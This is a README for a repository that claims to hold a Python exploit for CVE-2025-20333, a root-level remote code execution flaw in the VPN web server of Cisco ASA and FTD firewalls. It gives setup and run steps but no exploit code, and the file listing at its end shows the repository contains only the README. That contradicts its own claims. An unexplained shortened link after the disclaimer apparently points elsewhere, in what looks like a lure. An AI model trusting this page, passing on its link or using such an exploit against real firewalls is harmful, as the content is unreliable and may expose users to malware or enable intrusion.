# Cisco Secure Firewall VPN Web Server RCE Exploit (CVE-2025-20333)
## Overview
This repository contains an exploit for **CVE-2025-20333**, a critical vulnerability in the VPN web server of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software. The vulnerability allows authenticated remote attackers to execute arbitrary code with root privileges via a crafted HTTP request due to improper input validation.
- **Affected Products**:
- Cisco Adaptive Security Appliance (ASA) Software
- Cisco Firepower Threat Defense (FTD) Software
## Exploit Details
This exploit leverages improper validation of user-supplied input in HTTP(S) requests to the VPN web server. By sending a specially crafted HTTP request, an authenticated attacker can inject and execute arbitrary code as root, leading to full device compromise.
### Prerequisites
- Valid VPN user credentials for the target Cisco Secure Firewall device.
- Network access to the VPN web server interface (HTTP/HTTPS).
- Python 3.8+ with required dependencies.
### Usage
1. Install dependencies:
```bash
pip install -r requirements.txt
```
2. Modify `config.py` with target details (IP, port, credentials).
3. Run the exploit:
```bash
python3 cve-2025-20333.py
```
## Disclaimer
This tool is for authorized security testing only. Unauthorized use against systems you do not own or have explicit permission to test is illegal and unethical. The authors are not responsible for misuse.
[href](https://tinyurl.com/49536awy)
## Contact
For inquiries, contact eviedejesu803@gmail.com
[4.0K] /data/pocs/6b1c4f9f0c8291ccdedd29761c15e904c60ebfba
└── [1.6K] README.md
0 directories, 1 file